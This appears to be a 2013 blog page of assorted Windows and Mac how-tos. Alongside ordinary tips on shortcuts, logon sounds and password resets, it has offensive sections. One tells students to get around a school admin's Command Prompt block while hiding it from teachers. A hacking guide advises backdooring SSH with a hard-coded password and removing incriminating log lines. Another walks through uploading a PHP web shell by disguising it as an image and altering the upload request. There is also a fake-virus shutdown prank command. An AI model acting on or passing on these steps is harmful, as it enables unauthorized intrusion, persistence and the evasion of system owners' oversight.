Wednesday, 24 April 2013

How To Change Your Logon Screen’s Startup Sound in Windows 7

 How To Edit Your Logon Screen in Windows 7 (Tutorial Series)

  1. Type CMD in start menu search box or run and press Enter.

  2. Type the following in Command Prompt:
  3. TAKEOWN /F %windir%\system32\imageres.dll && ICACLS %windir%\system32\imageres.dll /GRANT Administrator:F

  4. Go to C:\Windows\System32 (Change C to your system drive) and make a backup of imageres.dll.
  5. Download and run Resource Hacker. Download Link

  6. Open C:\Windows\System32\imageres.dll in it. (Change C to your system drive)

  7. Click on the Action menu and select Replace other Resource ….

  8. Click Open file with new resource… and browse for the sound file that you want to use as the startup sound of the logon screen.
  9. Type WAVE in the Resource Type box.
  10. Type 5080 in the Resource Name box.
  11. Click on Replace.
  12. Click on the File menu and select Save.

  13. Go to C:\Windows\System32 (Change C to your system drive) and delete imageres_original.dll. Now restart your PC to hear the new startup sound.

Tuesday, 23 April 2013

How to Use Your Computer Without a Mouse

Keyboard shortcuts
Keyboard shortcuts
If you don’t like using a mouse or feel like it’s slowing you down, there are hundreds of keyboard shortcuts you can use instead. Here are some keyboard workarounds to use on the web, in Windows, and in Mac OS X.

Edit Steps


  1. If your operating system has Mouse Keys, Go to Start > Control Panel > Ease of Access to activate it. This will allow you to use the arrow keys to control your cursor in lieu of the mouse.
  2. Use these Windows system key combinations.
    • F1 -- Help
    • CTRL+ESC -- Open Start menu
    • ALT+TAB -- Switch between open programs
    • ALT+F4 -- Quit program
    • SHIFT+DELETE -- Delete item permanently
    • Windows Logo+L -- Lock the computer (without using CTRL+ALT+DELETE)
  3. Use these key combinations while writing on Windows.
    • CTRL+C -- Copy
    • CTRL+X -- Cut
    • CTRL+V -- Paste
    • CTRL+Z -- Undo
    • CTRL+B -- Bold
    • CTRL+U -- Underline
    • CTRL+I -- Italic
    • CTRL+Arrow Keys -- Skip Words
  4. Use these general keyboard-only commands.
    • F1 -- Starts Windows Help
    • F10 -- Activates menu bar options
    • SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
    • CTRL+ESC -- Opens the Start menu (use the ARROW keys to select an item)
    • CTRL+ESC or ESC -- Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
    • CTRL+SHIFT+ESC -- Opens Windows Task Manager
    • ALT+DOWN ARROW -- Opens a drop-down list box
    • ALT+TAB -- Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
    • SHIFT -- Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
    • ALT+SPACE -- Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
    • ALT+- (ALT+hyphen) -- Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
    • CTRL+TAB -- Switch to the next child window of a Multiple Document Interface (MDI) program
    • ALT+underlined letter in menu -- Opens the menu
    • ALT+F4 -- Closes the current window
    • CTRL+F4 -- Closes the current Multiple Document Interface (MDI) window
    • ALT+F6 -- Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)
  5. Use these shortcuts for shell objects and desktop shortcuts. For a selected object:
    • F2 -- Rename object
    • F3 -- Find all files
    • CTRL+X -- Cut
    • CTRL+C -- Copy
    • CTRL+V -- Paste
    • SHIFT+DELETE -- Delete selection immediately, without moving the item to the Recycle Bin
    • ALT+ENTER -- Open the properties for the selected object
  6. Use these general folder/shortcut controls.
    • F4 -- Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
    • F5 -- Refreshes the current window.
    • F6 -- Moves among panes in Windows Explorer
    • CTRL+G -- Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
    • CTRL+Z -- Undo the last command
    • CTRL+A -- Select all the items in the current window
    • BACKSPACE -- Switch to the parent folder
    • SHIFT+click+Close button -- For folders, close the current folder plus all parent folders
  7. Use these key combinations to control properties.
    • CTRL+TAB / CTRL+SHIFT+TAB -- Move through the property tabs
  8. Use these shortcuts for accessibility.
    • Press SHIFT five times -- Toggles StickyKeys on and off
    • Press down and hold the right SHIFT key for eight seconds -- Toggles FilterKeys on and off
    • Press down and hold the NUM LOCK key for five seconds -- Toggles ToggleKeys on and off
    • Left ALT+left SHIFT+NUM LOCK -- Toggles MouseKeys on and off
    • Left ALT+left SHIFT+PRINT SCREEN -- Toggles high contrast on and off
  9. Use these dialog box keyboard commands.
    • TAB -- Move to the next control in the dialog box
    • SHIFT+TAB -- Move to the previous control in the dialog box
    • SPACEBAR -- If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
    • ENTER -- Equivalent to clicking the selected button (the button with the outline)
    • ESC -- Equivalent to clicking the Cancel button
    • ALT+underlined letter in dialog box item -- Move to the corresponding item
  10. Use these shortcuts if you have a Microsoft Natural Keyboard.
    • Windows Logo -- Start menu
    • Windows Logo+R -- Run dialog box
    • Windows Logo+M -- Minimize all
    • SHIFT+Windows Logo+M -- Undo minimize all
    • Windows Logo+F1 -- Help
    • Windows Logo+E -- Windows Explorer
    • Windows Logo+F -- Find files or folders
    • Windows Logo+D -- Minimizes all open windows and displays the desktop
    • CTRL+Windows Logo+F -- Find computer
    • CTRL+Windows Logo+TAB -- Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
    • Windows Logo+TAB -- Cycle through taskbar buttons
    • Windows Logo+Break -- System Properties dialog box
    • Application key -- Displays a shortcut menu for the selected item
  11. Use these shortcuts if you have a Microsoft Natural Keyboard with IntelliType software installed.
    • Windows Logo+L -- Log off Windows
    • Windows Logo+P -- Starts Print Manager
    • Windows Logo+C -- Opens Control Panel
    • Windows Logo+V -- Starts Clipboard
    • Windows Logo+K -- Opens Keyboard Properties dialog box
    • Windows Logo+I -- Opens Mouse Properties dialog box
    • Windows Logo+A -- Starts Accessibility Options (if installed)
    • Windows Logo+SPACEBAR -- Displays the list of Microsoft IntelliType shortcut keys
    • Windows Logo+S -- Toggles CAPS LOCK on and off

Mac OS X

  1. If you have Universal Access, use these keyboard shortcuts to manipulate your cursor in lieu of using your mouse. To set this up, go to your Universal Access preferences and activate Mouse Keys.
    • 8 -- Move Up
    • 2 -- Move Down
    • 4 -- Move Left
    • 6 -- Move Right
    • 1 -- Move Diagonally Bottom Left
    • 3 -- Move Diagonally Bottom Right
    • 7 -- Move Diagonally Top Left
    • 9 -- Move Diagonally Top Right
    • 5 -- Press Mouse Button
    • 0 -- Hold Mouse Button
    • . (period on number pad) -- Release Hold Mouse Button
  2. Use these keyboard shortcuts to initiate processes during Startup.
    • Option -- Display all bootable volumes (Startup Manager)
    • Shift -- Perform Safe Boot (start up in Safe Mode)
    • C -- Start from a bootable disc (DVD, CD)
    • T -- Start in FireWire target disk mode
    • N -- Start from NetBoot server
    • X -- Force Mac OS X startup (if non+Mac OS X startup volumes are present)
    • Command+V -- Start in Verbose Mode
    • Command+S -- Start in Single User Mode
  3. Use these “finder” keyboard shortcuts.
    • Command+A -- Select all items in the front Finder window (or desktop if no window is open)
    • Option+Command+A -- Deselect all items
    • Shift+Command+A -- Open the Applications folder
    • Command+C -- Copy selected item/text to the Clipboard
    • Shift+Command+C -- Open the Computer window
    • Command+D -- Duplicate selected item
    • Shift+Command+D -- Open desktop folder
    • Command+E -- Eject
    • Command+F -- Find any matching Spotlight attribute
    • Shift+Command+F -- Find Spotlight file name matches
    • Option+Command+F -- Navigate to the search field in an already+open Spotlight window
    • Shift+Command+G -- Go to Folder
    • Shift+Command+H -- Open the Home folder of the currently logged+in user account
    • Command+I -- Get Info
    • Option+Command+I -- Show Inspector
    • Control+Command+I -- Get Summary Info
    • Shift+Command+I -- Open iDisk
    • Command+J -- Show View Options
    • Command+K -- Connect to Server
    • Shift+Command+K -- Open Network window
    • Command+L -- Make alias of the selected item
    • Command+M -- Minimize window
    • Option+Command+M -- Minimize all windows
    • Command+N -- New Finder window
    • Shift+Command+N -- New folder
    • Option+Command+N -- New Smart Folder
    • Command+O -- Open selected item
    • Shift+Command+Q -- Log Out
    • Option+Shift+Command+Q -- Log Out immediately
    • Command+R -- Show original (of alias)
    • Command+T -- Add to Sidebar
    • Shift+Command+T -- Add to Favorites
    • Option+Command+T -- Hide Toolbar / Show Toolbar in Finder windows
    • Shift+Command+U -- Open Utilities folder
    • Command+V -- Paste
    • Command+W -- Close window
    • Option+Command+W -- Close all windows
    • Command+X -- Cut
    • Option+Command+Y -- Slideshow (Mac OS X 10.5 or later)
    • Command+Z -- Undo / Redo
    • Command+1 -- View as Icon
    • Command+2 -- View as List
    • Command+3 -- View as Columns
    • Command+4 -- View as Cover Flow (Mac OS X 10.5 or later)
    • Command+, (Command and the comma key) -- Open Finder preferences
    • Command+` (the Grave accent key++above Tab key on a US English keyboard layout) -- Cycle through open Finder windows
    • Command+Shift+? -- Open Mac Help
    • Option+Shift+Command+Esc (hold for three seconds) -- Mac OS X v10.5, v10.6 or later only -- Force Quit front+most application
    • Command+[ -- Back
    • Command+] -- Forward
    • Command+Up Arrow -- Open enclosed folder
    • Control+Command+Up Arrow -- Open enclosed folder in a new window
    • Command+Down Arrow -- Open highlighted item
    • Command+Tab -- Switch application++cycle forward
    • Shift+Command+Tab -- Switch application++cycle backward
    • Command+Delete -- Move to Trash
    • Shift+Command+Delete -- Empty Trash
    • Option+Shift+Command+Delete -- Empty Trash without confirmation dialog
    • Spacebar (or Command+Y) -- Quick Look (Mac OS X 10.5 or later)
    • Command key while dragging -- Move dragged item to other volume/location (pointer icon changes while key is held++see this article)
    • Option key while dragging -- Copy dragged item (pointer icon changes while key is held++see this article)
    • Option+Command key combination while dragging -- Make alias of dragged item (pointer icon changes while key is held++see this article)
  4. Use these keyboard shortcuts for Application and other commands.
    • Command+Space -- Show or hide the Spotlight search field (if multiple languages are installed, may rotate through enabled script systems)
    • Control+A -- Move to beginning of line/paragraph
    • Control+B -- Move one character backward
    • Control+D -- Delete the character in front of the cursor
    • Control+E -- Move to end of line/paragraph
    • Control+F -- Move one character forward
    • Control+H -- Delete the character behind the cursor
    • Control+K -- Delete from the character in front of the cursor to the end of the line/paragraph
    • Control+L -- Center the cursor/selection in the visible area
    • Control+N -- Move down one line
    • Control+O -- Insert a new line after the cursor
    • Control+P -- Move up one line
    • Control+T -- Transpose the character behind the cursor and the character in front of the cursor
    • Control+V -- Move down one page
    • Option+Delete -- Delete the word that is left of the cursor, as well as any spaces or punctuation after the word
    • Option+Command+Space -- Show the Spotlight search results window (if multiple languages are installed, may rotate through keyboard layouts and input methods within a script)
    • Command+Tab -- Move forward to the next most recently used application in a list of open applications
    • Shift+Command+Tab -- Move backward through a list of open applications (sorted by recent use)
    • Shift+Tab -- Navigate through controls in a reverse direction
    • Control+Tab -- Move focus to the next grouping of controls in a dialog or the next table (when Tab moves to the next cell)
    • Shift+Control+Tab -- Move focus to the previous grouping of controls
    • Command+esc -- Open Front Row (if installed)
    • Option+Eject -- Eject from secondary optical media drive (if one is installed)
    • Control+Eject -- Show shutdown dialog
    • Option+Command+Eject -- Put the computer to sleep
    • Control+Command+Eject -- Quit all applications (after giving you a chance to save changes to open documents), then restart the computer
    • Control Option+Command+Eject -- Quit all applications (after giving you a chance to save changes to open documents), then shut down the computer
    • fn+Delete -- Forward Delete (on portable Macs' built+in keyboard)
    • Control+F1 -- Toggle full keyboard access on or off
    • Control+F2 -- Move focus to the menu bar
    • Control+F3 -- Move focus to the Dock
    • Control+F4 -- Move focus to the active (or next) window
    • Shift+Control+F4 -- Move focus to the previously active window
    • Control+F5 -- Move focus to the toolbar.
    • Control+F6 -- Move focus to the first (or next) panel
    • Shift+Control+F6 -- Move focus to the previous panel
    • Control+F7 -- Temporarily override the current keyboard access mode in windows and dialogs
    • F9 -- Tile or untile all open windows
    • F10 -- Tile or untile all open windows in the currently active application
    • F11 -- Hide or show all open windows
    • F12 -- Hide or display Dashboard
    • Command+` -- Activate the next open window in the frontmost application
    • Shift+Command+` -- Activate the previous open window in the frontmost application
    • Option+Command+` -- Move focus to the window drawer
    • Command+ -- (minus) -- Decrease the size of the selected item
    • Command+{ -- Left+align a selection
    • Command+} -- Right+align a selection
    • Command+| -- Center+align a selection
    • Command+: -- Display the Spelling window
    • Command+; -- Find misspelled words in the document
    • Command+, -- Open the front application's preferences window (if it supports this keyboard shortcut)
    • Option+Control+Command+, -- Decrease screen contrast
    • Option+Control+Command+. -- Increase screen contrast
    • Command+? -- Open the application's help in Help Viewer
    • Option+Command+/ -- Turn font smoothing on or off
    • Shift+Command+= -- Increase the size of the selected item
    • Shift+Command+3 -- Capture the screen to a file
    • Shift+Control+Command+3 -- Capture the screen to the Clipboard
    • Shift+Command+4 -- Capture a selection to a file
    • Shift+Control+Command+4 -- Capture a selection to the Clipboard
    • Command+A -- Highlight every item in a document or window, or all characters in a text field
    • Command+B -- Boldface the selected text or toggle boldfaced text on and off
    • Command+C -- Copy the selected data to the Clipboard
    • Shift+Command+C -- Display the Colors window
    • Option+Command+C -- Copy the style of the selected text
    • Control+Command+C -- Copy the formatting settings of the selected item and store on the Clipboard
    • Option+Command+D -- Show or hide the Dock
    • Command+Control+D -- Display the definition of the selected word in the Dictionary application
    • Command+D -- Selects the Desktop folder in Open and Save dialogs
    • Selects "Don't Save" in dialogs that contain a Don't Save button, in Mac OS X v10.6.8 and earlier --
    • Command+Delete -- Selects "Don't Save" in dialogs that contain a Don't Save button, in OS X Lion
    • Command+E -- Use the selection for a find
    • Command+F -- Open a Find window
    • Option+Command+F -- Move to the search field control
    • Command+G -- Find the next occurrence of the selection
    • Shift+Command+G -- Find the previous occurrence of the selection
    • Command+H -- Hide the windows of the currently running application
    • Option+Command+H -- Hide the windows of all other running applications
    • Command+I -- Italicize the selected text or toggle italic text on or off
    • Option+Command+I -- Display an inspector window
    • Command+J -- Scroll to a selection
    • Command+M -- Minimize the active window to the Dock
    • Option+Command+M -- Minimize all windows of the active application to the Dock
    • Command+N -- Create a new document in the frontmost application
    • Command+O -- Display a dialog for choosing a document to open in the frontmost application
    • Command+P -- Display the Print dialog
    • Shift+Command+P -- Display a dialog for specifying printing parameters (Page Setup)
    • Command+Q -- Quit the frontmost application
    • Command+S -- Save the active document
    • Shift+Command+S -- Display the Save As dialog
    • Command+T -- Display the Fonts window
    • Option+Command+T -- Show or hide a toolbar
    • Command+U -- Underline the selected text or turn underlining on or off
    • Command+V -- Paste the Clipboard contents at the insertion point
    • Option+Command+V -- Apply the style of one object to the selected object (Paste Style)
    • Option+Shift+Command+V -- Apply the style of the surrounding text to the inserted object (Paste and Match Style)
    • Control+Command+V -- Apply formatting settings to the selected object (Paste Ruler Command)
    • Command+W -- Close the frontmost window
    • Shift+Command+W -- Close a file and its associated windows
    • Option+Command+W -- Close all windows in the application without quitting it
    • Command+X -- Remove the selection and store in the Clipboard
    • Command+Z -- Undo previous command (some applications allow for multiple Undos)
    • Shift+Command+Z -- Redo previous command (some applications allow for multiple Redos)
    • Control+Right Arrow -- Move focus to another value or cell within a view, such as a table
    • Control+Left Arrow -- Move focus to another value or cell within a view, such as a table
    • Control+Down Arrow -- Move focus to another value or cell within a view, such as a table
    • Control+Up Arrow -- Move focus to another value or cell within a view, such as a table
    • Command+Right Arrow -- Move the text insertion point to the end of the current line
    • Command+Left Arrow -- Move the text insertion point to the beginning of the current line
    • Command+Down Arrow -- Move the text insertion point to the end of the document
    • Command+Up Arrow -- Move the text insertion point to the beginning of the document
    • Shift+Command+Right Arrow -- Select text between the insertion point and the end of the current line (*)
    • Shift+Command+Left Arrow -- Select text between the insertion point and the beginning of the current line (*)
    • Shift+Right Arrow -- Extend text selection one character to the right (*)
    • Shift+Left Arrow -- Extend text selection one character to the left (*)
    • Shift+Command+Up Arrow -- Select text between the insertion point and the beginning of the document (*)
    • Shift+Command+Down Arrow -- Select text between the insertion point and the end of the document (*)
    • Shift+Up Arrow -- Extend text selection to the line above, to the nearest character boundary at the same horizontal location (*)
    • Shift+Down Arrow -- Extend text selection to the line below, to the nearest character boundary at the same horizontal location (*)
    • Shift+Option+Right Arrow -- Extend text selection to the end of the current word, then to the end of the following word if pressed again (*)
    • Shift+Option+Left Arrow -- Extend text selection to the beginning of the current word, then to the beginning of the following word if pressed again (*)
    • Shift+Option+Down Arrow -- Extend text selection to the end of the current paragraph, then to the end of the following paragraph if pressed again (*)
    • Shift+Option+Up Arrow -- Extend text selection to the beginning of the current paragraph, then to the beginning of the following paragraph if pressed again (*)
    • Control+Space -- Toggle between the current and previous input sources
    • Option+Control+Space -- Toggle through all enabled input sources
    • Option+Command+esc -- Force Quit

Web Browsers

Use browser shortcuts.
  • Control+I -- Open Favorites
  • Control+H -- Open History
  • Control+N -- Open a new window
  • Control+O -- Open another document or webpage
  • Press Alt + letter underlined on toolbar -- Open toolbar option (ex. Alt+T opens Tools, Alt+H opens Help)
  • Control+E -- Go to search box
  • Alt+F – Find on page
  • Control+T -- Open new tab
  • Control+1,2,3,… -- Switch to 1st, 2nd, 3rd, etc. tab
  • Alt+D -- Select the text in the address bar
  • Control+Enter -- Add www. and .com to the text in the address bar (Internet Explorer)
  • F4 – Open list of websites you've typed (Internet Explorer)
  • Tab -- Move forward through items on a webpage
  • Shift+Tab -- Move backward through items on a webpage
  • Alt+Home -- Go to your homepage on Internet Explorer
  • Shift+F10 -- Open a shortcut menu for an Internet link
  • Control+Tab -- Move forward between tabs
  • Control+Shift+Tab -- Move backward between tabs

How to Unblock Command Prompt Anywhere

Unblock Command Prompt Anywhere
Have you ever been at school and you go to open command prompt and it says the admin has disabled command prompt or try to do a command and it gives you access is denied. well this article with tell you just how to unblock command prompt anywhere. The Program download link is in the things you will need section.

Edit Steps

  1. First you want to download this program which will let you bypass the block and get Command Prompt open.
  2. After you downloaded the program you want to open the .exe file in the folder. Their should be a x64.exe file and x86.exe file the 64 file is for 64 bit computers and the 86 file is for 32 bit computers.
  3. After you open the program, it should look like this
  4. To add command prompt to the program or any other program you want to add just click on the green plus sign.
  5. After you click on it a menu should pop up with 3 options browser for programs,search for programs or cancel.
  6. When you have added Command Prompt to the program, you can then press the play button near the top of the program but you have to first click on command prompt in the list and then hit the play button and if you did it right then it should be like this.
  7. You Now have unblocked Command Prompt and you can do anything in command prompt from a regular account without having a administrator account.

Edit Warnings

  • Be careful when doing this, many IT admins and tech guys do not like people messing around with their systems when they have it setup for a reason.
  • Don't do this around teachers or people that can see what your doing, do it when the teacher is not looking or anyone else.

How to Hack


  1. Use a *nix terminal for commands. Cygwin will help emulate a *nix for Windows users. Nmap in particular uses WinPCap to run on Windows and does not require Cygwin. However, Nmap works poorly on Windows systems due to a lack of raw sockets. You should also consider using Linux or BSD, which are both more flexible, more reliable, and more secure. Most Linux distributions come with many useful tools pre-installed.
  2. Secure your machine first. Make sure you've fully understood all common techniques to protect yourself. Start with the basics — have you found a server hosting a site about illegal or possibly bad activity? Attempt to hack it in any way you can. Don't change the site, just make it yours.
  3. Test the target. Can you reach the remote system? While you can use the ping utility (which is included in most operating systems) to see if the target is active, you can not always trust the results — it relies on the ICMP protocol, which can be easily shut off by paranoid system administrators.
  4. Determine the operating system (OS). Run a scan of the ports, and try pOf, or nmap to run a port scan. This will show you the ports that are open on the machine, the OS, and can even tell you what type of firewall or router they are using so you can plan a course of action. You can activate OS detection in nmap by using the -O switch.
  5. Find a path or open port in the system. Common ports such as FTP (21) and HTTP (80) are often well protected, and possibly only vulnerable to exploits yet to be discovered.
    • Try other TCP and UDP ports that may have been forgotten, such as Telnet and various UDP ports left open for LAN gaming.
    • An open port 22 is usually evidence of an SSH (secure shell) service running on the target, which can sometimes be bruteforced.
  6. Crack the password or authentication process. There are several methods for cracking a password, including brute force. Using brute force on a password is an effort to try every possible password contained within a pre-defined dictionary of brute force software
    • Users are often discouraged from using weak passwords, so brute force may take a lot of time. However, there have been major improvenments in brute-force techniques.
    • Most hashing algorithms are weak, and you can significally improve the cracking speed by exploiting these weaknesses (like you can cut the MD5 algorithm in 1/4, which will give huge speed boost).
    • Newer techniques use the graphics card as another processor — and it's thousands of times faster.
    • You may try using Rainbow Tables for the fastest password cracking. Notice that password cracking is a good technique only if you already have the hash of password.
    • Trying every possible password while logging to remote machine is not a good idea, as it's easily detected by intrusion detection systems, pollutes system logs, and may take years to complete.
    • It's often much easier to find another way into a system than cracking the password.
  7. Get super-user privileges. Try to get root privileges if targeting a *nix machine, or administrator privileges if taking on Windows systems.
    • Most information that will be of vital interest is protected and you need a certain level of authentication to get it. To see all the files on a computer you need super-user privileges - a user account that is given the same privileges as the "root" user in Linux and BSD operating systems.
    • For routers this is the "admin" account by default (unless it has been changed); for Windows, this is the Administrator account.
    • Gaining access to a connection doesn't mean you can access everything. Only a super user, the administrator account, or the root account can do this.
  8. Use various tricks. Often, to gain super-user status you have to use tactics such as creating a buffer overflow, which causes the memory to dump and that allows you to inject a code or perform a task at a higher level than you're normally authorized.
    • In unix-like systems this will happen if the bugged software has setuid bit set, so the program will be executed as a different user (super-user for example).
    • Only by writing or finding an insecure program that you can execute on their machine will allow you to do this.
  9. Create a backdoor. Once you have gained full control over a machine, it's a good idea to make sure you can come back again. This can be done by backdooring an important system service, such as the SSH server. However, your backdoor may be removed during the next system upgrade. A really experienced hacker would backdoor the compiler itself, so every compiled software would be a potential way to come back.
  10. Cover your tracks. Don't let the administrator know that the system is compromised. Don't change the website (if any), and don't create more files than you really need. Do not create any additional users. Act as quickly as possible. If you patched a server like SSHD, make sure it has your secret password hard-coded. If someone tries to log-in with this password, the server should let them in, but shouldn't contain any crucial information.


  • Although you may have heard the opposite, don't help anyone patch their programs or systems. This is considered extremely lame and leads to being banned from most hacking communities. And if you would release a private exploit someone found, he may become your enemy — and he's probably better than you are .
  • Don't delete entire logfiles, instead, just remove only the incriminating entries from the file. The other question is, is there a backup logfile? What if they just look for differences and find the exact things you erased? Always think about your actions. The best thing is to delete random lines of log, including yours.
  • Hacking into someone else's system may be illegal, so don't do it unless you are sure you have permission from the owner of the system you are trying to hack or you are sure it's worth it and you won't get caught.
  • Never do anything just for fun. Remember it's not a game to hack into a network, but a power to change the world. Don't waste that on childish actions.
  • Be extremely careful if you think you have found a very easy crack or a crude mistake in security management. A security professional protecting that system may be trying to trick you or setting up a honeypot.
  • If you aren't confident with your skills, avoid from breaking into corporate, government, or military networks. Even if they have weak security, they could have a lot of money to trace and bust you. If you do find a hole in such network, it's best to hand it to more experienced hacker that you trust who can put these systems to good use.
  • Misusing this information may be a local and/or federal criminal act (crime). This article is intended to be informational and should only be used for ethical - and not illegal - purposes.

Things You'll Need

  • A (fast operating) PC or laptop with a connection to the Internet.
  • A Proxy (optional)
  • An IP scanner
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How to upload PHP shell through Firefox Add-on


How to upload PHP shell through Firefox Add-on 

Many times you get login of a website, but you are unable to upload your PHP shell !
Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on

Install Tamper Data firefox add-on:
Download Tamper Data CLICK HERE
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename you .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

As an example i'll take -

It is a free classified ads posting website, so i got a upload option there !
Find your upload option click on browse, locate you .jpg shell and select it !

Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !

Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button

After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad

After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.

Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !


REXCYBERTRIX Facebook Clickjacking Scripts Hijacking Facebook Users

Facebook Clickjacking Scripts Hijacking Facebook Users 

In this post we will not talk or explain the mechanism behind clickhijacking attack. The goal and moto of this post is to let you know how abusive this attack has been since past recent months.
So for those of you who don't know Clickjacking is?, it is a method of hijacking a users click in tricking him to click in to clicking some thing else. In the past Clickhijacking was used to hijack users click in to clicking on advertisements and make revenue.
Here is an example of a wordpress clickhijacking script that costs about 15$, that would trick the users into clicking ads without annoying them.

However now a days clickjacking is being used for tricking users in to liking a facebook page. As you might know that due to panda effect internet marketers are seen to be more focused on social media promotion. Therefore clickjacking scripts provid lots and lots of benefits to people who tend to use black hat SEO for promotion of the website and facebook pages. 
But what makes this even worse is the people distributing the clickjacking scripts for free or selling it. Recently I came across dozens of forums selling clickjacking scritps on a very cheap rate.
Here are some of the screen shots which I took recently: 


In order to demonstrate how clickjacking works, I setup a page on my free hosting account embedded with clickjacking script that would trick the users into liking the following page on clicking:

Here is the screenshot of the page where I installed Clickjacking script. (I took the script from an online forum and then modified it to meet my needs). The infected page stated the following: 
On clicking the click here to download your FreeToSell Package link the script was initiated which automatically liked the voteformypic page. 

By now you might have understood the whole idea behind the clickjacking attack. However if you would like to see more detailed analysis, I would recommend you to check the following post Hijacking Facebook Users With Clickjacking


REXCYBERTRIX Most used and simple methods to reset Windows password

Most used and simple methods to reset Windows password 

 windows hacking trick
Windows give you the option of having a Windows password to log on.This is useful when more than one user profiles are enabled. "I forgot Windows password. How do I reset my Windows password?" is a hot topic nowadays. You should set strong Windows password for better security. But you should also know how to make a password reset disk in advance to in case that you forget the password in future, or how to eliminate the password for more convenient login. Now you will see some cases and the solution of problem.

You can't log into computer

The problem that how to reset Windows password is linked with a forgotten Windows password for most of the time. Many people look for a solution to this problem is easily because they forgot Windows password and can't log into the computer anymore. If you came have a similar problem, you can reset Windows password by using several methods.

1.Free Windows password recovery tools
Windows password recovery tools are applications used to recover, or reset lost user and administrator passwords in Windows operating systems. Password recovery tools can "crack" passwords. Here are the best, free tools available.
-Ophcrack The Ophcrack Windows password cracker is the best free Windows password recovery tool now. With Ophcrack, you don't need to access to Windows to retrieve the lost passwords. Download for free, burn it to a CD and boot from the CD. The Ophcrack application starts, recovers the passwords automatically. Ophcrack can run on Windows 7, Windows Vista, and Windows XP.

-Offline NT Password & Registry Editor Offline NT Password & Registry Editor operates differently than most password recovery tools in that it deletes the Windows password covering it. Download it , burn it to CD. You boot from a burned CD. After you run the app, you can log in to your Windows account without entering a password at all.
Offline NT Password & Registry works on Windows 7, Windows Vista, Windows 2000, and Windows NT.

-PC Login Now works differently than other password recovery programs. Instead of finding and displaying your current Windows password, PC Login Now erases it, letting you to access Windows without a password.
Download it , burn it to CD. Then your computer will boot with PC Login Now
The PC Login Now causes Windows to notice a possible hard drive problem on the first reboot after erasing the password. PC Login Now supports Windows 7, Windows Vista, and Windows XP.

2.Use Windows password reset disk
A Windows password reset disk can be created in advance to reset Windows password if you have such a CD here are the steps recover your Windows password.

-Boot your computer and insert the password reset CD in computer.
-Click your user account name and hit Enter.
-Click OK when an error message comes out.
-Click the “Reset password” under the password box.
-When Password Reset Wizard comes out, follow the steps to create a new password.
-Log on with your new password.

When you can log in as Administrator

Usually every user has numerous user accounts on his computer. If you forgot Windows password you can still log into the computer through another admin account. Please follow the steps to reset that forgotten password.

1.Use “lusrmgr.msc”
-Click the Start button, type "lusrmgr.msc" in the Search box, and click OK.
-Then "Local Users and Groups" opens.
-Expand the folder titled users on the Local users and groups window.
-Double-click "Local Users and Groups", and then click Users.
-Right-click the username which you need to change the password, and select Reset Password.
-Type and verify the new password.

2.Reset Windows password from the Command Prompt
With Command Prompt you can monitor all the user of the computer.
-Click the Start button, type "cmd" in the Search box, and click OK.
-Type net user amf newpass (amf is the locked admin account's name and newpass is the new password) and press Enter. Now you have successfully created a new password on the locked admin account.
-Type shutdown -r -t 00 and press Enter.

Your computer should be rebooted automatically and then you can log in Windows with the new password. It is a very simple way to change the password of any users from the Command Prompt. But you can change the password if you have Administrator privileges.

You can log in with the correct Windows password

It’s very simple to change your current Windows password.
-Log into your user account using a password.
-Open the User Accounts window by clicking Start - Control Panel - Family Safety and User Accounts - User Accounts.
- Click the “Change your password” link.
-Type your current password, type the new password, then enter it again, click Change password button.


How to Install Skype on a PC

Download the installer. Using the links in the Skype Links section, download the Skype installer for Windows.

  1. Open the "SkypeSetup.exe" file. Click "Run...".
    • The installer will open.
  2. 3
    Click "Save File" to save the Skype Setup Application.
  3. 4
    Click the "SkypeSetup" file in the "Downloads" window.
  4. 5
    Follow the simple steps in the Setup Wizard to complete the installation.
  5. 6
    Open Skype and sign in with your Skype Name and password.

For Macintosh

  1. 1
    Download the installer. Using the links in the Skype Links section, download the Skype installer for Mac OS X.

    • Click the "Get Skype for Mac OS X" button.
    • Skype will download automatically. If not, follow the links in this window:

  2. 2
    From your Downloads folder, open the .dmg file:

    • It will open a volume with the Skype application and an alias to your Applications folder.

    • Drag the Skype application onto the Application folder, and Skype will be installed.
  3. 3
    Open your Applications folder, find Skype, and launch it. You will be prompted for your user name and password. Enter those, and enjoy Skyping!

How to make a prank shutdown virus

How to make a prank shutdown virus

Ever wonder what new prank you could come up with to make your little sister go crazy? Here's a simple, yet very effective one. Just switch one of your desktop icons (i.e. Internet Explorer) with a fake one and a warning box will pop-up which will shut down your computer within 30 seconds. Isn't that enough to make lil' sister yell when she sees her Barbie doll game go bye-bye? Here's how it works:

This isn't really a virus ... its simply a shutdown program which will make your friends freak out.

First, you will need to create a shortcut. You can create a shortcut by right-clicking on your desktop and selecting New, and then, Shortcut.

A Create Shortcut box should then open. In that box, write the following:

shutdown -s -t 30 -c "VIRUS DETECTED!!"

